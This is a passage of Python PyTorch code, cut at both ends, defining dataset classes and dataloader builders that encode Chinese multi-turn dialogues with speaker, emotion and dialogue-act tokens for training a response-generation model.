enumerate(sequence[1:])
for _ in s]
if self.with_emotion:
instance["token_emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
if self.with_emotion:
token_type_ids = pad_sequence(
[torch.tensor(instance["token_emotion_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
elif self.with_da:
token_type_ids = pad_sequence(
[torch.tensor(instance["token_da_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, labels
class EDADIALDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[greeting], [greeting], [greeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
emotion_ids:[ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
if with_da==True:
da_ids: [ 0, 13103, 13103, 13103, 13103, 13103, 13103, 13103, 13103, 13103, 13103] # "[greeting]": 13103
token_type_ids: [ 0, 13103, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
def __init__(self,
data,
tokenizer,
emotion_type="Sentiment",
max_history=15,
batch_first=True,
lm_labels=True,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
self.da_size = 18 # Number of DA categories
self.emotion_size = 3 # Number of emotion categories
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # # Whether use DA to help generate dialogue
if self.emotion_type=="Sentiment":
self.emotion_size = 3
elif self.emotion_type=="BaseEmotion":
self.emotion_size = 7
else: # self.emotion_type==2
self.emotion_size = 15
self.max_history = max_history # Maximum number of dialogue sentences
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.lm_labels = lm_labels
self.keys = list(set(self.data['Dialogue_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
dialogue_id = self.keys[index]
data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
if self.lm_labels: # for train and valid dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
response = data_index["Token"].tolist()[-1]
else: # for test dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
response = []
return self.process(speaker_list, utterance_history, emotion_list, da_list, response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def convert_EMOTION_TO_TOKENS(self,emotion_list):
emotion_tokens_list = []
if self.emotion_type=="Sentiment": # "Sentiment"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
else: # "Emotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
return emotion_tokens_list
def convert_DA_TO_TOKENS(self,da_list):
da_tokens_list = []
for da in da_list:
da_tokens_list.append(DA_TO_TOKENS[da])
return da_tokens_list
def process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_da:
instance["da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_emotion:
instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def testdata_process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_da:
instance["da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_emotion:
instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
if self.with_emotion:
emotion_ids = pad_sequence(
[torch.tensor(instance["emotion_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
emotion_ids = None
if self.with_da:
da_ids = pad_sequence(
[torch.tensor(instance["da_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
da_ids = None
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, emotion_ids, da_ids, labels
class EDASDIALDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[greeting], [greeting], [greeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
emotion_ids:[ 0, 13102, -1, -1, 13102, -1, -1, 13102, -1, -1, -1] # "[neutral]": 13102
if with_da==True:
da_ids: [ 0, 13103, -1, -1, 13103, -1, -1, 13103, -1, -1, -1] # "[greeting]": 13103
token_type_ids: [ 0, 13103, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
def __init__(self,
data,
tokenizer,
emotion_type="Sentiment",
max_history=15,
batch_first=True,
lm_labels=True,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
self.da_size = 18 # Number of DA categories
self.emotion_size = 3 # Number of emotion categories
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # # Whether use DA to help generate dialogue
if self.emotion_type=="Sentiment":
self.emotion_size = 3
elif self.emotion_type=="BaseEmotion":
self.emotion_size = 7
else: # self.emotion_type==2
self.emotion_size = 15
self.max_history = max_history # Maximum number of dialogue sentences
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.lm_labels = lm_labels
self.keys = list(set(self.data['Dialogue_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
dialogue_id = self.keys[index]
data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
if self.lm_labels: # for train and valid dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
response = data_index["Token"].tolist()[-1]
else: # for test dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
emotion_list = self.convert_EMOTION_TO_TOKENS(data_index[self.emotion_type].tolist()[-2 * self.max_history:])
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.convert_DA_TO_TOKENS(data_index["DA"].tolist()[-2 * self.max_history:])
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
response = []
return self.process(speaker_list, utterance_history, emotion_list, da_list, response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def convert_EMOTION_TO_TOKENS(self,emotion_list):
emotion_tokens_list = []
if self.emotion_type=="Sentiment": # "Sentiment"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(SENTIMENT_TO_TOKENS[emo])
elif self.emotion_type=="BaseEmotion": # "BaseEmotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(BASEEMOTION_TO_TOKENS[emo])
else: # "Emotion"
for emo in emotion_list:
if emo not in SENTIMENT_TO_TOKENS:
emotion_tokens_list.append("[neutral]")
else:
emotion_tokens_list.append(EMOTION_TO_TOKENS[emo])
return emotion_tokens_list
def convert_DA_TO_TOKENS(self,da_list):
da_tokens_list = []
for da in da_list:
da_tokens_list.append(DA_TO_TOKENS[da])
return da_tokens_list
def set_da_in_speaker(self,da_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_da_ids = []
for i,da in enumerate(da_ids):
if input_ids[i] in special_token_ids_list:
new_da_ids.append(da_ids[i])
else:
new_da_ids.append(self.pad)
return new_da_ids
def set_emotion_in_speaker(self,emotion_ids,input_ids,bos, eos, speaker1, speaker2):
special_token_ids_list = [bos, eos, speaker1, speaker2]
new_emotion_ids = []
for i,emotion in enumerate(emotion_ids):
if input_ids[i] in special_token_ids_list:
new_emotion_ids.append(emotion_ids[i])
else:
new_emotion_ids.append(self.pad)
return new_emotion_ids
def process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_da:
instance["da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
# only set the DA in [speaker1] or [speaker2]
instance["da_ids"] = self.set_da_in_speaker(instance["da_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
if self.with_emotion:
instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
# only set the emotion in [speaker1] or [speaker2]
instance["emotion_ids"] = self.set_emotion_in_speaker(instance["emotion_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def testdata_process(self, speaker_list, history, emotion_list, da_list, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
emotion_list = self.tokenizer.convert_tokens_to_ids(emotion_list)
da_list = self.tokenizer.convert_tokens_to_ids(da_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
if self.with_da:
instance["da_ids"] = [bos] + [da_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
# only set the DA in [speaker1] or [speaker2]
instance["da_ids"] = self.set_da_in_speaker(instance["da_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
if self.with_emotion:
instance["emotion_ids"] = [bos] + [emotion_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
# only set the emotion in [speaker1] or [speaker2]
instance["emotion_ids"] = self.set_emotion_in_speaker(instance["emotion_ids"],instance["input_ids"],bos, eos, speaker1, speaker2)
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
if self.with_emotion:
emotion_ids = pad_sequence(
[torch.tensor(instance["emotion_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
emotion_ids = None
if self.with_da:
da_ids = pad_sequence(
[torch.tensor(instance["da_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
else:
da_ids = None
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, emotion_ids, da_ids, labels
def build_dataloaders(args, tokenizer, logger, load_test=False):
if load_test==False:
logger.info("Build train and validation dataloaders")
train_data,train_samples = get_data(args,tokenizer, args.train_path, logger) # args.train_path="/home/MMMTD/dialogue_text/mmmtd_train_split.csv"
valid_data,valid_samples = get_data(args,tokenizer, args.valid_path, logger) # args.valid_path="/home/MMMTD/dialogue_text/mmmtd_valid_split.csv"
train_dataset = MMMTDDataset(data=train_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
valid_dataset = MMMTDDataset(data=valid_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None
valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None
train_loader = DataLoader(train_dataset,
sampler=train_sampler,
collate_fn=train_dataset.collate,
num_workers=args.num_workers,
batch_size=args.train_batch_size,
shuffle=(not args.distributed))
valid_loader = DataLoader(valid_dataset,
sampler=valid_sampler,
collate_fn=valid_dataset.collate,
num_workers=args.num_workers,
batch_size=args.valid_batch_size,
shuffle=False)
return train_loader, valid_loader, train_sampler, valid_sampler
else:
logger.info("Build test dataloaders")
test_data, test_samples = get_data(args, tokenizer, args.test_path, logger) # args.test_path="/home/MMMTD/dialogue_text/mmmtd_test_split.csv"
test_dataset = MMMTDDataset(data=test_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset) if args.distributed else None
test_loader = DataLoader(test_dataset,
sampler=test_sampler,
collate_fn=test_dataset.collate,
num_workers=args.num_workers,
batch_size=args.test_batch_size,
shuffle=False)
return test_loader, test_sampler
def build_edadial_dataloaders(args, tokenizer, logger, load_test=False):
if load_test==False:
logger.info("Build train and validation dataloaders")
train_data,train_samples = get_data(args,tokenizer, args.train_path, logger) # args.train_path="/home/MMMTD/dialogue_text/mmmtd_train_split.csv"
valid_data,valid_samples = get_data(args,tokenizer, args.valid_path, logger) # args.valid_path="/home/MMMTD/dialogue_text/mmmtd_valid_split.csv"
train_dataset = EDADIALDataset(data=train_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
valid_dataset = EDADIALDataset(data=valid_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None
valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None
train_loader = DataLoader(train_dataset,
sampler=train_sampler,
collate_fn=train_dataset.collate,
num_workers=args.num_workers,
batch_size=args.train_batch_size,
shuffle=(not args.distributed))
valid_loader = DataLoader(valid_dataset,
sampler=valid_sampler,
collate_fn=valid_dataset.collate,
num_workers=args.num_workers,
batch_size=args.valid_batch_size,
shuffle=False)
return train_loader, valid_loader, train_sampler, valid_sampler
else:
logger.info("Build test dataloaders")
test_data, test_samples = get_data(args, tokenizer, args.test_path, logger) # args.test_path="/home/MMMTD/dialogue_text/mmmtd_test_split.csv"
test_dataset = EDADIALDataset(data=test_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset) if args.distributed else None
test_loader = DataLoader(test_dataset,
sampler=test_sampler,
collate_fn=test_dataset.collate,
num_workers=args.num_workers,
batch_size=args.test_batch_size,
shuffle=False)
return test_loader, test_sampler
def build_edasdial_dataloaders(args, tokenizer, logger, load_test=False):
if load_test==False:
logger.info("Build train and validation dataloaders")
train_data,train_samples = get_data(args,tokenizer, args.train_path, logger) # args.train_path="/home/MMMTD/dialogue_text/mmmtd_train_split.csv"
valid_data,valid_samples = get_data(args,tokenizer, args.valid_path, logger) # args.valid_path="/home/MMMTD/dialogue_text/mmmtd_valid_split.csv"
train_dataset = EDASDIALDataset(data=train_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
valid_dataset = EDASDIALDataset(data=valid_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None
valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None
train_loader = DataLoader(train_dataset,
sampler=train_sampler,
collate_fn=train_dataset.collate,
num_workers=args.num_workers,
batch_size=args.train_batch_size,
shuffle=(not args.distributed))
valid_loader = DataLoader(valid_dataset,
sampler=valid_sampler,
collate_fn=valid_dataset.collate,
num_workers=args.num_workers,
batch_size=args.valid_batch_size,
shuffle=False)
return train_loader, valid_loader, train_sampler, valid_sampler
else:
logger.info("Build test dataloaders")
test_data, test_samples = get_data(args, tokenizer, args.test_path, logger) # args.test_path="/home/MMMTD/dialogue_text/mmmtd_test_split.csv"
test_dataset = EDASDIALDataset(data=test_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset) if args.distributed else None
test_loader = DataLoader(test_dataset,
sampler=test_sampler,
collate_fn=test_dataset.collate,
num_workers=args.num_workers,
batch_size=args.test_batch_size,
shuffle=False)
return test_loader, test_sampler
class REDIALDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[greeting], [greeting], [greeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
elif with_da==True:
token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[greeting]": 13088
else:
token_type_ids: [ 0, 13086, 13086, 13086, 13087, 13087, 13087, 13086, 13086, 13086, 13086]
labels:
'''
def __init__(self,
data,
tokenizer,
emotion_type="Sentiment",
max_history=15,
batch_first=True,
lm_labels=True,
with_emotion=False,
with_da=False):
self.data = data
self.tokenizer = tokenizer
self.emotion_type = emotion_type # "Sentiment" or "BaseEmotion" or "Emotion"
self.with_emotion=with_emotion # Whether use emotion to help generate dialogue
self.with_da=with_da # # Whether use DA to help generate dialogue
self.max_history = max_history # Maximum number of dialogue sentences
self.pad = tokenizer.pad_token_id
self.batch_first = batch_first
self.lm_labels = lm_labels
self.keys = list(set(self.data['Dialogue_ID']))
self.len = len(self.keys)
def __len__(self):
return self.len
def __getitem__(self, index):
dialogue_id = self.keys[index]
data_index = self.data[self.data['Dialogue_ID']==dialogue_id]
if self.lm_labels: # for train and valid dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
current_speaker = speaker_list[-1]
current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
response = data_index["Token"].tolist()[-1]
else: # for test dataset
speaker_list = self.create_speaker(data_index["Speaker"].tolist()[-2 * self.max_history:])
utterance_history = data_index["Token"].tolist()[-2 * self.max_history:-1]
current_speaker = speaker_list[-1]
current_emotion_id = EMOTION_TO_ID[data_index[self.emotion_type].tolist()[-1]]
response = []
return self.process(speaker_list, utterance_history, current_speaker, current_emotion_id, response)
def create_speaker(self,speaker_list):
speaker1 = speaker_list[0]
new_speaker_list = []
for speaker in speaker_list:
if speaker==speaker1:
new_speaker_list.append("[speaker1]")
else:
new_speaker_list.append("[speaker2]")
return new_speaker_list
def process(self, speaker_list, history, current_speaker, current_emotion_id, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
instance["current_emotion_id"] = current_emotion_id
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def testdata_process(self, speaker_list, history, current_speaker, current_emotion_id, response, with_eos=True):
bos, eos, speaker1, speaker2 = self.tokenizer.convert_tokens_to_ids(SPECIAL_TOKENS)
speaker_list = self.tokenizer.convert_tokens_to_ids(speaker_list)
instance = {}
sequence = [[bos]] + history + [response + ([eos] if with_eos else [])]
sequence = [sequence[0]] + [[speaker_list[i]] + s
for i, s in enumerate(sequence[1:])]
instance["input_ids"] = list(chain(*sequence))
instance["token_type_ids"] = [bos] + [speaker_list[i] for i, s in
enumerate(sequence[1:])
for _ in s]
instance["current_speaker_id"] = self.tokenizer.convert_tokens_to_ids(current_speaker)
instance["current_emotion_id"] = current_emotion_id
instance["lm_labels"] = [-1] * len(instance["input_ids"])
if self.lm_labels:
instance["lm_labels"] = ([-1] * sum(len(s) for s in sequence[:-1])) + [-1] + sequence[-1][1:]
return instance
def collate(self, batch):
input_ids = pad_sequence(
[torch.tensor(instance["input_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
token_type_ids = pad_sequence(
[torch.tensor(instance["token_type_ids"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=self.pad)
current_speaker_id = torch.tensor(
[torch.tensor(instance["current_speaker_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
current_emotion_id = torch.tensor(
[torch.tensor(instance["current_emotion_id"], dtype=torch.long) for instance in batch],
dtype=torch.long)
labels = pad_sequence(
[torch.tensor(instance["lm_labels"], dtype=torch.long) for instance in batch],
batch_first=self.batch_first, padding_value=-1)
return input_ids, token_type_ids, current_speaker_id, current_emotion_id, labels
def build_redial_dataloaders(args, tokenizer, logger, load_test=False):
if load_test==False:
logger.info("Build train and validation dataloaders")
train_data,train_samples = get_data(args,tokenizer, args.train_path, logger) # args.train_path="/home/MMMTD/dialogue_text/mmmtd_train_split.csv"
valid_data,valid_samples = get_data(args,tokenizer, args.valid_path, logger) # args.valid_path="/home/MMMTD/dialogue_text/mmmtd_valid_split.csv"
train_dataset = REDIALDataset(data=train_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
valid_dataset = REDIALDataset(data=valid_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
train_sampler = torch.utils.data.distributed.DistributedSampler(train_dataset) if args.distributed else None
valid_sampler = torch.utils.data.distributed.DistributedSampler(valid_dataset) if args.distributed else None
train_loader = DataLoader(train_dataset,
sampler=train_sampler,
collate_fn=train_dataset.collate,
num_workers=args.num_workers,
batch_size=args.train_batch_size,
shuffle=(not args.distributed))
valid_loader = DataLoader(valid_dataset,
sampler=valid_sampler,
collate_fn=valid_dataset.collate,
num_workers=args.num_workers,
batch_size=args.valid_batch_size,
shuffle=False)
return train_loader, valid_loader, train_sampler, valid_sampler
else:
logger.info("Build test dataloaders")
test_data, test_samples = get_data(args, tokenizer, args.test_path, logger) # args.test_path="/home/MMMTD/dialogue_text/mmmtd_test_split.csv"
test_dataset = REDIALDataset(data=test_data,
tokenizer=tokenizer,
emotion_type=args.emotion_type,
max_history=args.max_history,
batch_first=True,
lm_labels=True,
with_emotion=args.with_emotion,
with_da=args.with_da)
test_sampler = torch.utils.data.distributed.DistributedSampler(test_dataset) if args.distributed else None
test_loader = DataLoader(test_dataset,
sampler=test_sampler,
collate_fn=test_dataset.collate,
num_workers=args.num_workers,
batch_size=args.test_batch_size,
shuffle=False)
return test_loader, test_sampler
class RDADIALDataset(Dataset):
'''
word_tokens: [CLS] [speaker1] 您 好 [speaker2] 您 好 [speaker1] 再 见 [SEP]
emotion_list: [[neutral], [neutral], [neutral]]
da_list: [[gRDAeting], [gRDAeting], [gRDAeting]]
input_ids: [ 0, 13086, 448, 53, 13087, 448, 53, 13086, 154, 124, 2]
if with_emotion==True:
token_type_ids: [ 0, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102, 13102] # "[neutral]": 13102
elif with_da==True:
token_type_ids: [ 0, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088, 13088] # "[gRDAeting]": 13088
